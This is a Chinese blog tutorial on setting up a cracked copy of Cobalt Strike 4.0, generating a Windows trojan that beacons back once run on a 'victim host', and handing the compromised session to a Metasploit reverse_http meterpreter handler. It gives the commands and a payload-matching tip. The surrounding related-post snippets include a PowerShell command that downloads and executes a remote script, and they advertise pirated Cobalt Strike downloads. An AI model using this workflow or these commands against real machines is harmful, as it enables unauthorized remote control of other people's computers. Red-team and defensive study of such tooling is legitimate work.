Cobaltstrike的安装和基本使用+MSF联动

已于 2022-03-12 19:13:15 修改
阅读量1.1w 收藏 30
点赞数 1
分类专栏: 网络安全 Tools 文章标签: 服务器 linux 安全
于 2022-01-15 21:29:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45951067/article/details/122504276
版权

Cobaltstrike的安装

注意:配置cs需要配置客户端和服务器

服务器端

首先下载cobaltstrike,下载完成后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,进入解压后的目录运行如下命令:

./teamserver 101.43.x.x password  #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip

在这里插入图片描述

客户端

将cobaltstrike4.0-cracked.zip解压,双击运行start.bat,并配置你的服务器ip和端口(默认50050),点击Connection

这里的用户名随便填,密码就是刚刚在服务器上设置的密码

在这里插入图片描述
连接完成界面;
在这里插入图片描述

Cobaltstrike的使用

Cobaltstrike和msfconsole最大的区别就是CS支持多个人一同协作(多人运动),因为是多人协作,所以需要区分一下哪些资源是各自的,通过配置监听器来实现拥有各自的监听管道
在这里插入图片描述
按照下图配置完成后,点击HTTP Hosts右边的+号,最后save保存即可
在这里插入图片描述
到这里,监听器就配置完成了!

简单木马生成实例

下面来举一个简单的实现攻击的例子:
这里面是常见的攻击工具,我们拿下图的Windows Executable为例
在这里插入图片描述
配置木马的监听器,配置完成后点击Generate生成木马,将其导出即可
在这里插入图片描述
将该木马放到受害主机上双击运行,即可收到上线提示
在这里插入图片描述

命令的输入

进入图形化界面右击鼠标选择Interact,即可输入命令,输入help可以查看命令列表
在这里插入图片描述
例如输入一条cmd命令:

shell ipconfig

在这里插入图片描述
探针其他主机

net view

插件的扩展

CS本身自带的插件并不是很多,所以如果有更多需求,可以通过扩展插件来解决
在这里插入图片描述

Cobaltstrike与Msfconsole的联动

部署Msfconsole

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 5555      #监听5555端口
exploit

部署Cobaltstrike

1.添加一个msf监听器,HTTP Host是你的外网服务器地址,HTTP Port 自定义
在这里插入图片描述
2.添加一个木马监听器
在这里插入图片描述
3.生成木马,并选择名为wooden horse的监听器,并用木马控制目标主机(步骤省略)
在这里插入图片描述
4.右击受控主机,点击spawn,并选择名为msf的监听器
在这里插入图片描述

同时msfconsole服务器这边选择监听

use exploit/multi/handler
set lhost 0.0.0.0
set lport 5555
set payload windows/meterpreter/reverse_http

这时候再去看msfconsole服务器,已经成功收到反弹会话【这里可能要等待连接的时间有点长】
在这里插入图片描述

这里有个坑我有必要说一下,由下图可知msf联动的监听器的payload是http的,我之前一直在msf配置windows/meterpreter/reverse_tcp,结果导致一直断开连接,连接不上,一定要注意,这边的payload是啥,对应那边就用啥!!!
在这里插入图片描述

向阳-Y.
关注
专栏目录
MSFCobaltStrike联动
谢公子的博客
09-09 1万+
目录 当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell 当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell 当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell 在MSF上的操作: use exploit/multi/handler set payload windows/...
Cobalt StrikeMSF联动
weixin_42035825的博客
03-29 2909
cs的会话---->msf的会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
CobaltStrike V4.zip
03-20
Cobalt Strike is software for Adversary Simulations and Red Team Operations.
CobaltStrike(CS)与MetasploitFramework(MSF联动
LuckySec
12-04 2428
0x01 CS与MSF CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。 早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver)
Cobalt Strike 4.8 用户指南-第一节-Cobalt Strike介绍及安装
最新发布
YJ_12340的博客
08-14 1279
图中的 Intrumentation & Telemetry 大概可以翻译为「终端行为采集 Agent & 云端 行为分析引擎」。Instrumentation 指的应该是安装在目标主机上的各类日志收集与监控类工 具, Telemetry 指的应该是将这些监控类工具所产出的各位监测日志进行归一化、汇聚到一个统 一分析引擎并等待引擎的研判结果这类的过程。深思熟虑的有针对性的攻击从都是从侦察开始的。的系统分析器是一个Web应用程序,可以映射目标的客户端攻击面。
Cobalt StrikeMSF联动
Longwaer
02-10 1290
学习掌握CS的各种小技巧,便于渗透工作中的运用。
MSFCobaltStrike联动相互会话派生,并通过MSF进行内网攻击
da_chuan_chuan的博客
04-27 1808
文章目录前言一、将CS会话派生给MSF1、前期准备:2、Cobaltstrike派生会话给MSF二、MSF进行内网攻击1、前言:2、攻击步骤如下三、将MSF中的会话派生给CS1、前言2、使用步骤:总结 前言 本文主要介绍MSFCobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。 当前网络设置为: 一、将CS会话派
Cobalt Strike
一凡凡凡人的博客
11-06 1315
Cobalt Strike 安装平台 ​ Ubuntu 16.04 环境 ​ Oracle Jdk 1.8 安装Oracle Jdk 1.8 apt-get install software-properties-common python-software-properties python安装出错没事 add-apt-repository ppa:webupd8team/java ap...
msf+cobaltstrike联动(一):把msf的session发给cobaltstrike
逗比大师的博客
08-04 612
前提:MFS已经获取到session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。 cobaltstrike起一个beacon监听,如使用:windows/beacon_http/reverse_http 设置好host和port之后启动监听。 MSF使用 use exploit/windows/local/payload_inject...
2024年网安最全Cobalt Strike汉化版——安装使用教程_kali安装cobaltstrike4
2401_84264583的博客
05-01 1690
New Connection #新建连接,支持连接多个服务器端Preferences #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录Visualization #主要展示输出结果的视图VPN Interfaces #设置VPN接口Listenrs #创建监听器script Manager #脚本管理,可以通过Aggressorscripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等close #退出连接2、View。
Cobalt Strike下载
04-09
cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。
cobaltstrike3.12
10-23
cobaltstrike-trial3.12最新试用版path
内网安全Cobalt StrikeMSF 联动( 会话 相互转移 )
dzqxwzoe的博客
03-08 503
也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike。内网安全Cobalt StrikeMSF 联动( 会话 相互转移 )(3)开启 Cobalt Strike 工具.在 MSF 会话中 转移 会话到 CS 上.在 CS 会话中 转移 会话到 MSF 上.(5)会话转移到 MSF 中.(5)会话转移到 CS 中.(1)上线 MSF 会话.(2)进行监听模式.(4)添加一个监听.(2)添加一个监听.
cobalt strike
tlucky的博客
05-06 335
1.简介 Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁 者的后渗透行动。 2.启动团队服务器 Cobalt Strike 团队服务器必须在受支持的 Linux 系统上运行。要启动一个 Cobalt Strike 团队服务器使用 Cobalt Strike Linux 安装包中的 teamserver 脚本文件。 3.客户端连接 使用 Cobalt Strike 客户端连接至团队服务器。要启动 Cobalt Strike 客户端,使用对应的的
CobaltStrike(钓鱼攻击工具)
F2444790591的博客
02-10 4123
一、介绍 (1)Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作,服务端:1个,客户端:N个。 (2)Cobalt Strike集成了功能和模块:端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成。 二、使用Cobaltstrike4.0) 1、Cobaltstrike 服务端的启动。 (1)开启Cobalt............
Cobalt Strike(学习笔记)
那年烟花终亦冷
06-07 3471
Cobalt Strike简介 Cobalt Strike 是一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。 Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。 注:鉴于作为新人面试会用到这些基础知识,所以把简介也抄过来了。 安装Cobal
msf传递shell给cobalt strike
mirror97black的博客
04-11 2268
前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))" 方法2:通过msf的expl...
使用CobaltStrike接口传递MSF shell的渗透测试教程
"E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell" 在网络安全和渗透测试领域,Cobalt Strike是一款备受专业人士青睐的高级威胁模拟工具,它主要用于红队操作、漏洞利用和权限提升。本课程主要讲解...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值